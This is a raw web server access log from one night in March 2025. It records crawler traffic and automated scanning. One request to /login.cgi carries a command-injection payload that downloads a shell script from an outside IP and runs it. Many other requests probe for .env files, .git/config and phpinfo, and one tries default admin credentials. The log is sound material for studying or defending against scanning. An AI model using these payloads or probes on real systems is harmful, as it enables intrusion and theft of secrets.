156.59.198.135 - - [01/Mar/2025:01:00:37 +0100] "GET /hausegger.activities.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:01:04:37 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115037.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [01/Mar/2025:01:07:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.229.232.140 - - [01/Mar/2025:01:11:07 +0100] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
47.121.133.117 - - [01/Mar/2025:01:27:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.136 - - [01/Mar/2025:01:36:10 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910231403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.85.250 - - [01/Mar/2025:01:36:41 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
204.76.203.15 - - [01/Mar/2025:01:40:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [01/Mar/2025:01:47:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101271603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
104.234.115.157 - - [01/Mar/2025:02:09:57 +0100] "" 400 383 "-" "-"
104.234.115.157 - - [01/Mar/2025:02:10:04 +0100] "\x16\x03\x01" 400 383 "-" "-"
104.234.115.157 - - [01/Mar/2025:02:10:17 +0100] "GET / HTTP/1.1" 200 274 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.157 - - [01/Mar/2025:02:12:22 +0100] "\x16\x03\x01" 400 383 "-" "-"
104.234.115.157 - - [01/Mar/2025:02:12:28 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
156.59.198.136 - - [01/Mar/2025:02:16:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107211603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:02:20:21 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10892841.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.207.125.193 - - [01/Mar/2025:02:23:57 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 378 "-" "-"
156.59.198.136 - - [01/Mar/2025:02:24:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.13 - - [01/Mar/2025:02:31:23 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
93.174.93.12 - - [01/Mar/2025:02:43:12 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [01/Mar/2025:02:44:23 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10922779.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:02:48:23 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116333.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:02:52:24 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910051203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:03:01:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105171103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [01/Mar/2025:03:02:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [01/Mar/2025:03:11:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010061403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.60 - - [01/Mar/2025:03:19:19 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
78.153.140.177 - - [01/Mar/2025:03:19:46 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0"
78.153.140.177 - - [01/Mar/2025:03:19:46 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.177 - - [01/Mar/2025:03:19:46 +0100] "GET /staging/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_1 like Mac OS X; zh-tw) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8G4 Safari/6533.18.5"
78.153.140.177 - - [01/Mar/2025:03:19:47 +0100] "GET /.env.save HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; Kurio7S Build/120a) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.177 - - [01/Mar/2025:03:19:48 +0100] "GET /stage/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
196.251.85.238 - - [01/Mar/2025:03:37:35 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
87.239.191.53 - - [01/Mar/2025:03:39:46 +0100] "GET /%7Eridersde/joomla/index.php HTTP/1.0" 404 386 "http://coffeenostra.castlegem.co.uk/%7Eridersde/joomla/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
87.239.191.53 - - [01/Mar/2025:03:39:46 +0100] "GET / HTTP/1.0" 200 423 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
156.59.198.135 - - [01/Mar/2025:03:43:01 +0100] "GET /renault.activities.at/htdocs/log/cron/exportXML_3116153.txt HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:03:47:02 +0100] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3116035.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.224 - - [01/Mar/2025:03:48:57 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
78.153.140.224 - - [01/Mar/2025:03:48:57 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.224 - - [01/Mar/2025:03:48:57 +0100] "GET /portal/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 OPR/15.0.1147.153"
78.153.140.224 - - [01/Mar/2025:03:48:58 +0100] "GET /env.txt HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
78.153.140.224 - - [01/Mar/2025:03:48:58 +0100] "GET /phpinfo/ HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SM-T815 Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Safari/537.36"
78.153.140.224 - - [01/Mar/2025:03:48:58 +0100] "GET /images/.env HTTP/1.1" 404 356 "-" "Dalvik/1.6.0 (Linux; U; Android 4.3; GT-I9300 Build/JSS15J)"
78.153.140.224 - - [01/Mar/2025:03:48:59 +0100] "GET /.env.save.1 HTTP/1.1" 404 356 "-" "More Firefox 3.6.3 user agents strings -->>"
78.153.140.224 - - [01/Mar/2025:03:49:00 +0100] "GET /apis/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MAGWJS; rv:11.0) like Gecko"
78.153.140.224 - - [01/Mar/2025:03:49:00 +0100] "GET /platform/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C5055d Safari/601.1"
78.153.140.224 - - [01/Mar/2025:03:49:01 +0100] "GET /developer/.env HTTP/1.1" 404 359 "-" "Opera/9.80 (Windows NT 6.2) Presto/2.12.388 Version/12.12"
78.153.140.224 - - [01/Mar/2025:03:49:01 +0100] "GET /stag/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
78.153.140.224 - - [01/Mar/2025:03:49:02 +0100] "GET /.env.json HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; Android 6.0.1; LGLS676 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36"
78.153.140.224 - - [01/Mar/2025:03:49:03 +0100] "GET /exapi/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Safari/601.6.17"
78.153.140.224 - - [01/Mar/2025:03:49:04 +0100] "GET /inf/ HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SCH-R820 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.224 - - [01/Mar/2025:03:49:04 +0100] "GET /libs/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.1"
78.153.140.224 - - [01/Mar/2025:03:49:04 +0100] "GET /base_dir/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; es-us; Y220-U00 Build/HUAWEIY220-U00) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.224 - - [01/Mar/2025:03:49:05 +0100] "GET /components/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.7) Gecko/20050414 Firefox/1.0.3"
78.153.140.224 - - [01/Mar/2025:03:49:06 +0100] "GET /controllers/.env HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2"
156.59.198.136 - - [01/Mar/2025:03:52:10 +0100] "GET /renault.activities.at/htdocs/log/cron/check_inventory_days_3116468.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:04:02:02 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001221203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.156.129.133 - - [01/Mar/2025:04:12:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
194.150.162.4 - - [01/Mar/2025:04:16:04 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
156.59.198.136 - - [01/Mar/2025:04:25:28 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10762566.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [01/Mar/2025:04:28:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.128.99.233 - - [01/Mar/2025:04:29:29 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.121.39 - - [01/Mar/2025:04:45:31 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:04:53:31 +0100] "GET /hausegger.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:04:57:31 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image101.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:05:01:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912200903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.30.93 - - [01/Mar/2025:05:05:32 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:05:13:32 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.126.160.245 - - [01/Mar/2025:05:16:33 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
78.153.140.151 - - [01/Mar/2025:05:16:37 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; CrOS x86_64 10176.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.144 Safari/537.36"
78.153.140.151 - - [01/Mar/2025:05:16:37 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.151 - - [01/Mar/2025:05:16:39 +0100] "GET /backend/.env HTTP/1.1" 404 357 "-" "More Firefox 1.5.0.6 user agents strings -->>"
78.153.140.151 - - [01/Mar/2025:05:16:40 +0100] "GET /api/.env HTTP/1.1" 404 353 "-" "Opera/7.11 (Windows NT 5.1; U) [en]"
156.59.198.136 - - [01/Mar/2025:05:17:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11504354.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:05:21:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11312050.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:05:25:33 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102161203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
204.76.203.15 - - [01/Mar/2025:05:27:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.221.122.108 - - [01/Mar/2025:05:28:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
18.221.122.108 - - [01/Mar/2025:05:28:26 +0100] "\x16\x03\x01" 400 383 "-" "-"
18.221.122.108 - - [01/Mar/2025:05:28:27 +0100] "\x16\x03\x01" 400 383 "-" "-"
18.221.122.108 - - [01/Mar/2025:05:29:07 +0100] "" 400 383 "-" "-"
47.128.124.65 - - [01/Mar/2025:05:29:34 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.203.56.2 - - [01/Mar/2025:05:31:13 +0100] "GET / HTTP/1.1" 200 423 "-" "HTTP Banner Detection (https://security.ipip.net)"
114.32.126.61 - - [01/Mar/2025:05:39:41 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "\x16\x03\x01" 400 383 "-" "-"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "GET /integration/.git/config HTTP/1.1" 404 293 "-" "l9explore/1.2.2"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "GET /production/.git/config HTTP/1.1" 404 293 "-" "l9explore/1.2.2"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "GET /project/frontend/.git/config HTTP/1.1" 404 298 "-" "l9explore/1.2.2"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "GET /releases/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [01/Mar/2025:05:40:49 +0100] "GET /modules/utils/.git/config HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
156.59.198.136 - - [01/Mar/2025:05:46:54 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10623307.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.156.128.131 - - [01/Mar/2025:06:00:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
156.59.198.135 - - [01/Mar/2025:06:05:20 +0100] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3116214.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:06:17:21 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116152.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [01/Mar/2025:06:19:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [01/Mar/2025:06:22:44 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115771.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
220.135.152.21 - - [01/Mar/2025:06:26:53 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
93.174.93.12 - - [01/Mar/2025:06:37:09 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116"
156.59.198.136 - - [01/Mar/2025:06:43:02 +0100] "GET /renault.activities.at/htdocs/log/cron/exportXML_3115091.txt HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [01/Mar/2025:07:03:04 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116343.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [01/Mar/2025:07:07:04 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12299685.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.105.71.175 - - [01/Mar/2025:07:10:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Python/3.11 aiohttp/3.11.11"
46.105.71.175 - - [01/Mar/2025:07:10:03 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Python/3.11 aiohttp/3.11.11"
156.59.198.136 - - [01/Mar/2025:07:11:04 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11044938.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.133.93.247 - - [01/Mar/2025:07:50:27 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.133.93.247 - - [01/Mar/2025:07:56:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.133.93.247 - - [01/Mar/2025:07:56:12 +0100] "" 400 383 "-" "-"
3.133.93.247 - - [01/Mar/2025:07:59:31 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.133.93.247 - - [01/Mar/2025:08:02:53 +0100] "SSH-2.0-Go" 400 383 "-" "-"
156.59.198.135 - - [01/Mar/2025:08:04:15 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12094933.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.133.93.247 - - [01/Mar/2025:08:04:42 +0100] "\x16\x03\x01" 400 383 "-" "-"
87.251.78.46 - - [01/Mar/2025:08:17:37 +0100] "GET /phpinfo.php HTTP/1.1" 200 10473 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
80.82.77.202 - - [01/Mar/2025:08:22:58 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 6.0.1; SM-G900H Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36"
193.68.89.10 - - [01/Mar/2025:08:24:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [01/Mar/2025:08:29:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005111103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
125.228.28.243 - - [01/Mar/2025:08:44:38 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
220.132.197.23 - - [01/Mar/2025:08:47:34 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
196.251.86.78 - - [01/Mar/2025:09:02:23 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
156.59.198.135 - - [01/Mar/2025:09:05:29 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10963806.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
128.85.24.6 - - [01/Mar/2025:09:09:45 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
128.85.24.6 - - [01/Mar/2025:09:09:46 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.124.166.151 - - [01/Mar/2025:09:38:58 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
185.242.226.116 - - [01/Mar/2025:09:50:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
